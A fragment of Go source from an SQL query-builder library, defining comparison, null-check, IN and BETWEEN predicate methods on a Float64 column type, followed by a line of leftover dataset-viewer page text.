// LT builds a less-than comparison against a literal value.
func (p Float64) LT(value float64) operator.Binary {
	return operator.LessThan(p, expr.NewValue(value))
}
// LTPath builds a less-than comparison against an expression.
func (p Float64) LTPath(exp lingo.Expression) operator.Binary {
	return operator.LessThan(p, exp)
}
// LTOrEq builds a less-than-or-equal comparison against a literal value.
func (p Float64) LTOrEq(value float64) operator.Binary {
	return operator.LessThanOrEqual(p, expr.NewValue(value))
}
// LTOrEqPath builds a less-than-or-equal comparison against an expression.
func (p Float64) LTOrEqPath(exp lingo.Expression) operator.Binary {
	return operator.LessThanOrEqual(p, exp)
}
// GT builds a greater-than comparison against a literal value.
func (p Float64) GT(value float64) operator.Binary {
	return operator.GreaterThan(p, expr.NewValue(value))
}
// GTPath builds a greater-than comparison against an expression.
func (p Float64) GTPath(exp lingo.Expression) operator.Binary {
	return operator.GreaterThan(p, exp)
}
// GTOrEq builds a greater-than-or-equal comparison against a literal value.
func (p Float64) GTOrEq(value float64) operator.Binary {
	return operator.GreaterThanOrEqual(p, expr.NewValue(value))
}
// GTOrEqPath builds a greater-than-or-equal comparison against an expression.
func (p Float64) GTOrEqPath(exp lingo.Expression) operator.Binary {
	return operator.GreaterThanOrEqual(p, exp)
}
// IsNull builds an IS NULL predicate for this column.
func (p Float64) IsNull() operator.Unary {
	return operator.IsNull(p)
}
// IsNotNull builds an IS NOT NULL predicate for this column.
func (p Float64) IsNotNull() operator.Unary {
	return operator.IsNotNull(p)
}
// In builds an IN predicate over the given literal values.
func (p Float64) In(values ...float64) operator.Binary {
	return operator.In(p, expr.NewParens(expr.NewValue(values)))
}
// InPaths builds an IN predicate over the given expressions.
func (p Float64) InPaths(exps ...lingo.Expression) operator.Binary {
	return operator.In(p, expr.NewParens(expr.ToList(exps)))
}
// NotIn builds a NOT IN predicate over the given literal values.
func (p Float64) NotIn(values ...float64) operator.Binary {
	return operator.NotIn(p, expr.NewParens(expr.NewValue(values)))
}
// NotInPaths builds a NOT IN predicate over the given expressions.
func (p Float64) NotInPaths(exps ...lingo.Expression) operator.Binary {
	return operator.NotIn(p, expr.NewParens(expr.ToList(exps)))
}
// Between builds a BETWEEN predicate over two literal bounds.
func (p Float64) Between(first, second float64) operator.Binary {
	return operator.Between(p, expr.NewValue(first), expr.NewValue(second))
}
// BetweenPaths builds a BETWEEN predicate over two expression bounds.
func (p Float64) BetweenPaths(first, second lingo.Expression) operator.Binary {
	return operator.Between(p, first, second)
}
// NotBetween builds a NOT BETWEEN predicate over two literal bounds.
func (p Float64) NotBetween(first, second float64) operator.Binary {
	return operator.NotBetween(p, expr.NewValue(first), expr.NewValue(second))
}
// NotBetweenPaths builds a NOT BETWEEN predicate over two expression bounds.
func (p Float64) NotBetweenPaths(first, second lingo.Expression) operator.Binary {
	return operator.NotBetween(p, first, second)
}
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.